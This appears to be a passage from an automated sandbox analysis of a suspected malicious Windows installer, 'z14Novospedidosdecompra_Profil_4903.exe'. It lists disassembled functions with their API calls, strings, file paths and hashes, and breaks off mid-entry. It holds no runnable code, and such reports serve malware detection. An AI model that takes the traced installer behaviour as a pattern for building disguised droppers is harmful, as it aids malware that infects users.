                                                                                              • Instruction ID: 98cd9110a96fdc90c980e8b88af1c06473e6a142e5aecddf25117f52f4c400a7
                                                                                              • Opcode Fuzzy Hash: a63e6e2122d515d214c502fe3e454e68733c502862964fa3bbe4886b2a00d4bb
                                                                                              • Instruction Fuzzy Hash: 217181B1900209BFDB109F60DD89AAA7B79FB84745F00803AF745B62D1C778AD51CFA8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                              • DrawTextW.USER32(00000000,Podning Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                              • String ID: F$Podning Setup
                                                                                              • API String ID: 941294808-3382129368
                                                                                              • Opcode ID: 2f348b4d91443a475dcd35d85824ce7e5a946905d26cbae13f88812008241038
                                                                                              • Instruction ID: 99fcf956b6c6492db4cb7183bc7c026c58e5ce6762c1973727186ff321cad974
                                                                                              • Opcode Fuzzy Hash: 2f348b4d91443a475dcd35d85824ce7e5a946905d26cbae13f88812008241038
                                                                                              • Instruction Fuzzy Hash: 81418A71800209AFCF058F95DE459AFBBB9FF44315F04842EF991AA1A0C778EA54DFA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405D7F Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • lstrcpyW.KERNEL32(004308E8,NUL), ref: 00405D8E
                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,?,00405F12,?,?), ref: 00405DB2
                                                                                              • GetShortPathNameW.KERNEL32(?,004308E8,00000400), ref: 00405DBB
                                                                                                • Part of subcall function 00405B8A: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9A
                                                                                                • Part of subcall function 00405B8A: lstrlenA.KERNEL32(00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BCC
                                                                                              • GetShortPathNameW.KERNEL32(004310E8,004310E8,00000400), ref: 00405DD8
                                                                                              • wsprintfA.USER32 ref: 00405DF6
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,00000004,004310E8,?,?,?,?,?), ref: 00405E31
                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E40
                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E78
                                                                                              • SetFilePointer.KERNEL32(0040A558,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A558,00000000,[Rename],00000000,00000000,00000000), ref: 00405ECE
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00405EDF
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EE6
                                                                                                • Part of subcall function 00405C25: GetFileAttributesW.KERNELBASE(00000003,00402E2E,00442800,80000000,00000003,?,?,"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe",00403536,?), ref: 00405C29
                                                                                                • Part of subcall function 00405C25: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe",00403536,?), ref: 00405C4B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                              • String ID: %ls=%ls$NUL$[Rename]
                                                                                              • API String ID: 222337774-899692902
                                                                                              • Opcode ID: 30846692017808bfd9aa764f556a0762a2c37fabb6d3c616e21c38c05ea1324d
                                                                                              • Instruction ID: 0ee0d7f4969d0e8ff8498481139b35b4394cb67f0e1a7fb2b2bdcfef73d002b4
                                                                                              • Opcode Fuzzy Hash: 30846692017808bfd9aa764f556a0762a2c37fabb6d3c616e21c38c05ea1324d
                                                                                              • Instruction Fuzzy Hash: 59310230200B147BD2207B619D49F6B3A6CDF45759F14003BBA85F62D2DA7C9E018EEC
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004062E4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CharNextW.USER32(?,*?|<>/":,00000000,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00406347
                                                                                              • CharNextW.USER32(?,?,?,00000000), ref: 00406356
                                                                                              • CharNextW.USER32(?,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 0040635B
                                                                                              • CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 0040636E
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004062E5
                                                                                              • "C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe", xrefs: 004062E4
                                                                                              • *?|<>/":, xrefs: 00406336
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: Char$Next$Prev
                                                                                              • String ID: "C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                              • API String ID: 589700163-586655422
                                                                                              • Opcode ID: 7b766ee50bb8b1a0f4eab2cbe77ea87c6d078045d263edb3b82a780548374b37
                                                                                              • Instruction ID: 318300b0f17d4b51c4b24ffcfd5e9ca079934b39012f6efb3a6e40df4f12a45c
                                                                                              • Opcode Fuzzy Hash: 7b766ee50bb8b1a0f4eab2cbe77ea87c6d078045d263edb3b82a780548374b37
                                                                                              • Instruction Fuzzy Hash: EF11B22680071695DB303B149C40AB7A2B8EF58790B56903FED8AB32C1F77C5C9286FD
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040417B Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 00404198
                                                                                              • GetSysColor.USER32(00000000), ref: 004041B4
                                                                                              • SetTextColor.GDI32(?,00000000), ref: 004041C0
                                                                                              • SetBkMode.GDI32(?,?), ref: 004041CC
                                                                                              • GetSysColor.USER32(?), ref: 004041DF
                                                                                              • SetBkColor.GDI32(?,?), ref: 004041EF
                                                                                              • DeleteObject.GDI32(?), ref: 00404209
                                                                                              • CreateBrushIndirect.GDI32(?), ref: 00404213
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2320649405-0
                                                                                              • Opcode ID: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                                                                                              • Instruction ID: 1f16dc129e5574868776b4f98a2cc19ea4617ee8107c94e5cfbd03f7ded5ca1d
                                                                                              • Opcode Fuzzy Hash: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                                                                                              • Instruction Fuzzy Hash: 1F2181B1500704ABCB219F68DE08B5BBBF8AF41714B04896DF992F66A0D734E944CB64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004025E5 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 151fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                                                                                                • Part of subcall function 00405D06: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405D1C
                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                              • String ID: 9
                                                                                              • API String ID: 163830602-2366072709
                                                                                              • Opcode ID: c65befc1453d79e0c2e8f89943b80396fddc1db08f78317adda9697148674731
                                                                                              • Instruction ID: c1a49ad6acc88ab736a24109aaa050e218125fd0ad183605519c9d8fb0938606
                                                                                              • Opcode Fuzzy Hash: c65befc1453d79e0c2e8f89943b80396fddc1db08f78317adda9697148674731
                                                                                              • Instruction Fuzzy Hash: EC510874D00219AADF209F94CA88AAEB779FF04344F50447BE501F72D0D7B99982DB69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00404A79 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A94
                                                                                              • GetMessagePos.USER32 ref: 00404A9C
                                                                                              • ScreenToClient.USER32(?,?), ref: 00404AB6
                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AC8
                                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AEE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Send$ClientScreen
                                                                                              • String ID: f
                                                                                              • API String ID: 41195575-1993550816
                                                                                              • Opcode ID: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
                                                                                              • Instruction ID: f7db0f90848f06194adfa2b80852422f0d01f782293f8b66888e1da33f3275eb
                                                                                              • Opcode Fuzzy Hash: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
                                                                                              • Instruction Fuzzy Hash: 28015271E4021CBADB00DB94DD85FFEBBBCAF59711F10012BBA51B61C0C7B495018BA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00402D04 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                                              • MulDiv.KERNEL32(0008255E,00000064,00082562), ref: 00402D4D
                                                                                              • wsprintfW.USER32 ref: 00402D5D
                                                                                              • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                                                              Strings
                                                                                              • verifying installer: %d%%, xrefs: 00402D57
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                              • String ID: verifying installer: %d%%
                                                                                              • API String ID: 1451636040-82062127
                                                                                              • Opcode ID: 9823b761f001492aa494ef634f2695fad7e965f30442b605b2107c3f38143bb8
                                                                                              • Instruction ID: e3b7989a6944ee3f74a5da6e22ee0ffb045f4e525cc1af55651639455de3416a
                                                                                              • Opcode Fuzzy Hash: 9823b761f001492aa494ef634f2695fad7e965f30442b605b2107c3f38143bb8
                                                                                              • Instruction Fuzzy Hash: F9014F7064020DBBEF249F61DE49FEA3B69FB04304F008439FA02A91E0DBB889559B58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040567E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004056C1
                                                                                              • GetLastError.KERNEL32 ref: 004056D5
                                                                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056EA
                                                                                              • GetLastError.KERNEL32 ref: 004056F4
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004056A4
                                                                                              • C:\Users\user\Desktop, xrefs: 0040567E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                                              • API String ID: 3449924974-2028306314
                                                                                              • Opcode ID: 00ef7c6a0f32c1044080c086edeac3c819c61aa9b54d8d974478d91d60ac005e
                                                                                              • Instruction ID: dfae01ed47dc7750d2476d71b6e364c3d252909874df994a371284b211a748b1
                                                                                              • Opcode Fuzzy Hash: 00ef7c6a0f32c1044080c086edeac3c819c61aa9b54d8d974478d91d60ac005e
                                                                                              • Instruction Fuzzy Hash: 18011A71D10619DADF009FA0CA447EFBFB8EF14304F00443AD549B6190E7799608CFA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00402840 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                                                              • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                                              • CloseHandle.KERNEL32(?), ref: 00402914
                                                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                              • String ID:
                                                                                              • API String ID: 2667972263-0
                                                                                              • Opcode ID: f1eabbae7b06e92946478ab2060b3523c0261a503aecf3c78af0c62330ce9ec7
                                                                                              • Instruction ID: 1aef917cd227803a683e0008524bb9a83fcfbb8b8ade77014dfab24c7f5e3f69
                                                                                              • Opcode Fuzzy Hash: f1eabbae7b06e92946478ab2060b3523c0261a503aecf3c78af0c62330ce9ec7
                                                                                              • Instruction Fuzzy Hash: F121C172800128BBCF216FA5CE49D9E7E79EF09324F20023AF510762E1C7795D418FA8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00402BFF Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
                                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
